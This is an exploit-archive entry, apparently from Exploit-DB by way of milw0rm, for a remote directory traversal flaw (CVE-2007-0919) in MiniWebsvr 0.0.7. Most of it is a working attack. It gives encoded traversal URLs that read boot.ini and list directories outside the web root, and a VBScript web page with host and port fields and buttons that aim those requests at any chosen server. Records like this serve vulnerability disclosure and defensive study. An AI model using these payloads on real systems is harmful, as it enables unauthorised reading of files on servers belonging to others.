MiniWebsvr 0.0.7 - Remote Directory Traversal

Author: shinnai
type: remote
platform: multiple
port: 
date_added: 2007-04-10 
date_updated: 2016-09-26 
verified: 1 
codes: OSVDB-50022;CVE-2007-0919 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comminiwebsvr_0.0.7-win32.tar.gz

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------
<b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b>
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
-------------------------------------------------------------

Host			Port
<input type=text name=txtIP value = "localhost">	<input type=text name=txtPort value = "8080">

<input language=VBScript onclick=GetBoot() type=button value="Click to get boot.ini">

<input language=VBScript onclick=BrowseMe() type=button value="Click to browse">

<script language='vbscript'>
Sub GetBoot
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub

Sub BrowseMe
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-04-11]